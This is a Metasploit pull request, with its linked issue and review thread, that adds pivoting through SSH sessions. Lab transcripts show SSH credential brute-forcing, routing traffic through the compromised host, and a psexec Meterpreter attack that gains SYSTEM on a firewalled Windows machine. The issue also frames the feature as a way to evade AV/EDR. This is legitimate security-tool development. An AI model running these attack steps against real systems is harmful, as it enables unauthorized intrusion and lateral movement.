### PR TITLE
Support for SSH pivoting

### LINKED ISSUE #15288: Pivoting over SSH Sessions
## Summary

I tweeted back to the Metasploit twitter a while back, but I'd love to be able to pivot over SSH sessions. SSH natively allows for port forwarding and for a SOCKS proxy to be created. It would be great to utilize this functionality through existing SSH sessions without needing to upgrade to a meterpreter session. 

This has the benefit of laying low to bypass AV/EDR. 

### Basic example

The current setup could look like this to obtain an SSH session and attempt to add a route.

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf6 auxiliary(scanner/ssh/ssh_login) > set username admin
username => admin
msf6 auxiliary(scanner/ssh/ssh_login) > set password password
password => password
msf6 auxiliary(scanner/ssh/ssh_login) > exploit -z

[*] 192.168.1.1:22 - Starting bruteforce
[+] 192.168.1.1:22 - Success: 'admin:password' 'foobar'
[*] Command shell session 1 opened (192.168.1.2:42249 -> 192.168.1.1:22) at 2021-06-02 11:39:30 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                                  Connection
  --  ----  ----         -----------                                  ----------
  1         shell linux  SSH admin:password (192.168.1.1:22)  192.168.1.2:42249 -> 192.168.1.1:22 (192.168.1.1)

msf6 auxiliary(scanner/ssh/ssh_login) > route add 10.8.0.0/24 1
[-] Cannot route through the specified session (not a Comm)
msf6 auxiliary(scanner/ssh/ssh_login) >
```

Instead, it would be great to see ```[*] Route added``` and be able to use the route to pivot through the SSH session.

### Motivation

Right now a Metasploit user will need to upgrade their SSH shell to a meterpreter session to be able to construct a pivot. This has the potential to set off AV/EDR. At a minimum it's time consuming and requires additional steps.

Alternatively, a user will need to obtain their session in a normal terminal and use the ssh CLI on their machine to obtain the same pivoting.

It would be great to stay within Metasploit and just pivot through a basic SSH session. 

----

I can help out with coding/testing, but I wanted to gauge interest/feasibility from R7 first. Please let me know your thoughts.

### PR DESCRIPTION
**Pull request by zeroSteiner**
This adds a new Command Shell session type specifically for SSH client connections backed by Net::SSH. This new session type then provides the necessary interface to allow the framework to pivot connections over it just like Meterpreter can. To my knowledge, this is only the second session type to support this interface which is why some of the Meterpreter-specific code was moved into a more generic location where it could be used by other session types.

I updated the two auxiliary modules that open SSH sessions, that's `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey`. I only updated those ones because I knew I could test them and a lot of the exploits target appliances which I'm not sure allow forwarding traffic within their respective configurations.

This requires the changes proposed in rapid7/rex-core#14 in order to pass some descriptive error messages to the user. This is important and useful for informing them about the limitations.

See the helpful description here about server sockets not being supported:
```
msf6 payload(linux/x64/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 1
msf6 payload(linux/x64/meterpreter/reverse_tcp) > 
[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). TCP server sockets are not supported by SSH sessions.
```

## Why SshCommandShellBind?
We already had a `SshCommandShell` session type which has been renamed to `SshCommandShellReverse`. These two are different in regards to the direction in which the connection is established. When Metasploit framework is playing the role of the SSH server, it can not request that clients open connections on it's behalf. Because of this difference in capabilities, it is necessary to split them. Additionally, the `SshCommandShellBind` uses Net::SSH where as `SshCommandShellReverse` uses `HrrRbSsh`. Maybe `SshCommandShellClient` / `SshCommandShellServer` would be a better naming convention? I'm open to changing it.

## Limitations
This currently only supports TCP client connections (both IPv4 and IPv6). While Metasploit and OpenSSH both support pivoted TCP server connections, this implementation left that out as a next step. Unfortunately, SSH does not support pivoting UDP traffic, so that is not and likely never will be supported. 🤷🏻 

Another limitation is that SSH doesn't seem to return the local socket information like Meterpreter does (because we wrote it and are able to). This means we can't determine what the IP address and port the pivoting machine is using to connect to the target. They're left as 0.0.0.0:0 which is why that's seen in some output. I don't anticipate this being a large problem because it's not usually needed for anything but diagnostic purposes and a zeroed out value is a pretty good indicator that it's unknown / set by the OS.

## Verification

- [ ] Use one of the two auxiliary modules to open a session
- [ ] Add a route to push all IPv4 traffic through the new session (run: `route add 0 0 -1`)
- [ ] Run some modules through it, establish some connections, make sure some connections are rejected the works
* Demonstrate that connections closed on either side work as intended
    - [ ] Use NMap's `ncat` in a new terminal on some system that is accessible from the one you are pivoting through
    - [ ] Run ncat in verbose mode to show where the connection is coming from (run `ncat -vv -l 1337`)
    - [ ] Use msfconsole's `connect` command to establish a connection to `ncat` (run `connect TARGETIP 1337`)
    - [ ] See in `ncat`'s output that the connection **was established from the pivoting machine, not the msfconsole machine**
    - [ ] Type some data in to both ends, see it go through to the other
    - [ ] Close one end (ctrl+c in msfconsole, ctrl+d in ncat), see the other end closed the connection
    - [ ] Repeat the steps, but this time close the connection from the opposite end
- [ ] See that the original session that all of the connections were routed through is still active and responsive (you still have a shell when interacting with it)

Relates to #15288

### CODE REVIEW

File: lib/msf/core/exploit/remote/smb/client/psexec.rb [hunk 1]
```diff
@@ -95,6 +95,8 @@ def smb_read_file(smbshare, host, file)
   # @param disconnect [Boolean] Disconnect afterwards
   # @return [Boolean] Whether everything went well
   def psexec(command, disconnect=true)
+    remove_socket(self.sock)
```
Comment (zeroSteiner) [inline lib/msf/core/exploit/remote/smb/client/psexec.rb:98]: This is off topic but it fixes a race condition I noticed while testing this where when the session is opened the socket would be closed while psexec is still trying to remove the service for cleanup. Without this in place, the session would be opened but the module would hang for a minute before reporting a timeout error as it was trying to delete the service.

The socket is closed on session creation by:
* [`#abort_sockets`](https://github.com/rapid7/metasploit-framework/blob/09fe84faed5fa055df54fdf858ebd0de750eb34f/lib/msf/core/exploit/remote.rb#L48)
* [`#on_session`](https://github.com/rapid7/metasploit-framework/blob/09fe84faed5fa055df54fdf858ebd0de750eb34f/lib/msf/core/payload.rb#L508)

**Comment by wvu-r7** [comment]
My hero!

**Comment by zeroSteiner** [comment]
This has been unblocked now that the rex-core PR has been landed adding the necessary changes for the exception details.

**Comment by smcintyre-r7** [comment]
@msjenkins-r7 test this please.

**Comment by smcintyre-r7** [comment]
@msjenkins-r7 test this please.

**Comment by cdelafuente-r7** [comment]
Thanks @zeroSteiner, this is great! The code looks good to me and I successfully passed the Verification steps you provided in this PR's description.

I still need to finish testing one or two things before I land it, but, in the meantime, I wanted to let you know `rubocop` is returning errors on these files, which is expected since most of them a copied from older code. Do you think it would be possible to make `rubocop` happy again? Not a big deal if it requires too much rework.

**Comment by adfoster-r7** [comment]
I think it'd be great to add a few documentation lines for this, as it's pretty cool functionality that users might otherwise miss! It might be worth calling out that it will only work when `AllowTcpForwarding` is enabled in the host's `/etc/ssh/sshd_config` file, or similar. Although I learnt the hard way that `open failed: administratively prohibited` can also be a catch all for all sorts of subtle issues/config problems - https://unix.stackexchange.com/questions/14160/ssh-tunneling-error-channel-1-open-failed-administratively-prohibited-open 😄 

For additional verification I also checked that it would work with a more complex scenario of having a network setup of `Host -> A -> B -> C` where A and B can talk, but A and C can't. I grabbed an initial foothold to A through an exploit, set up port forwarding, opened a new ssh_login session to B, set up port forwarding to C, then successfully ran modules against C. Everything worked pretty well!

Machine B was using alpine + openss, but I'd also like to try it against dropbear later today too - just to verify its behavior more than anything

**Comment by zeroSteiner** [comment]
Well we don't really have a good spot for session-specific documentation, especially when there's not a corresponding payload module like Meterpreter but I added in a short section to the ssh_login module docs in 426898e.

**Comment by cdelafuente-r7** [comment]
Thanks @zeroSteiner for these updates. I retested following the Verification steps and successfully pivot from a Linux system to Windows using both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules. I'll go ahead and land it.

### Example output
Here is my test setup:
`192.168.144.100 (attacker MSF) --> 192.168.144.135 (Linux pivot) --> 192.168.144.223 (Windows target)`

On the Windows host, a firewall blocks any requests coming from the attacker's host.

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.144.135
RHOSTS => 192.168.144.135
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME sshtest
USERNAME => sshtest
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 123456
PASSWORD => 123456
msf6 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD          123456           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            192.168.144.135  yes       The target host(s), range CIDR identifier, or hosts file with syntax
                                                 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          sshtest          no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per
                                                 line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.144.135:22 - Starting bruteforce
[+] 192.168.144.135:22 - Success: 'sshtest:123456' 'uid=1001(sshtest) gid=1001(sshtest) groups=1001(sshtest) Linux ubuntu 5.4.0-77-generic #86~18.04.1-Ubuntu SMP Fri Jun 18 01:23:22 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.144.100:41727 -> 192.168.144.135:22) at 2021-08-09 12:05:14 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                              Connection
  --  ----  ----         -----------                              ----------
  1         shell linux  SSH sshtest:123456 (192.168.144.135:22)  192.168.144.100:41727 -> 192.168.144.135:22 (192.1
                                                                  68.144.135)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -1
[*] Starting interaction with 1...

id
uid=1001(sshtest) gid=1001(sshtest) groups=1001(sshtest)
ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ce:f5:48:ee  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.144.135  netmask 255.255.255.0  broadcast 192.168.144.255
        inet6 fe80::73d4:5564:1dd1:418d  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:21:7f:68  txqueuelen 1000  (Ethernet)
        RX packets 190994  bytes 275446839 (275.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23793  bytes 4562202 (4.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1084  bytes 101732 (101.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1084  bytes 101732 (101.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

^Z
Background session 1? [y/N]  y
msf6 auxiliary(scanner/ssh/ssh_login) > route add 0 0 -1
[*] Route added
msf6 auxiliary(scanner/ssh/ssh_login) > nc -nv 192.168.144.223 11111
[*] exec: nc -nv 192.168.144.223 11111

^C
Interrupt: use the 'exit' command to quit
msf6 auxiliary(scanner/ssh/ssh_login) > connect 192.168.144.223 11111
[*] Connected to 192.168.144.223:11111 (via: 0.0.0.0:0)
test
hey!
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.144.223
RHOSTS => 192.168.144.223
msf6 exploit(windows/smb/psexec) > set SMBUser smbtest2
SMBUser => smbtest2
msf6 exploit(windows/smb/psexec) > set SMBPASS 123456
SMBPASS => 123456
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.144.223  yes       The target host(s), range CIDR identifier, or hosts file with sy
                                                    ntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) o
                                                    r a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               123456           no        The password for the specified username
   SMBUser               smbtest2         no        The username to authenticate as


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.144.223  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > nc -nv 192.168.144.223 445
[*] exec: nc -nv 192.168.144.223 445

^C
Interrupt: use the 'exit' command to quit
msf6 exploit(windows/smb/psexec) > run

[*] 192.168.144.223:445 - Connecting to the server...
[*] 192.168.144.223:445 - Authenticating to 192.168.144.223:445 as user 'smbtest2'...
[*] 192.168.144.223:445 - Selecting PowerShell target
[*] 192.168.144.223:445 - Executing the payload...
[+] 192.168.144.223:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.144.223:4444
[*] Sending stage (175174 bytes) to 192.168.144.223
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 192.168.144.223:4444) at 2021-08-09 12:10:21 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-DP0M1BC768
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > ifconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 12
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:fd:f4:53
MTU          : 1500
IPv4 Address : 192.168.144.223
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::286d:916:fcc1:1857
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 14
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:90df
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).

**Pull request merged**